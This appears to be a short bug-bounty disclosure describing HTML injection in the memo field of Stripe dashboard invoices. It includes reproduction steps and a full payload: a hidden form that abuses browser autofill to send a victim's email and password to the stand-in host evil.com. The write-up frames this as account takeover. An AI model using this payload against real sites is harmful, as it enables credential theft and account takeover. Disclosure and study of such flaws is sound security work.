In customer invoices a memo field is vulnerable to HTML injection. So i can takeover any victim’s account with auto-save functionality through HTML injection. Basically when we saved the login credential in our browser & tried to login into the account the browser automatically fills the email & pass we just need to click on login. so I created a login form and make the email & password field invisible by setting Opacaity:0 in CSS and set my button name to “Load more content”.
Login to your account and save your email and password in your browser
Go to https://dashboard.stripe.com/invoices. Create new invoice or edit any invoice
Memo field is vulnerable to HTML injection. So just paid this HTML code to memo field “<form action=”//evil.com" method=“GET”><input type=“text” name=“u” style=‘opacity:0;’><input type=“password” name=“p” style=‘opacity:0;’><input type=“submit” name=“s” value=“Load more content”> "
Save the invoice. Now open that invoice in a new tab.
You can see a “load more content” button there. Just click on that button and in evil.com you will find your email and password in URL.
You can takeover any victim’s account by sending that invoice
Takeover any victim’s account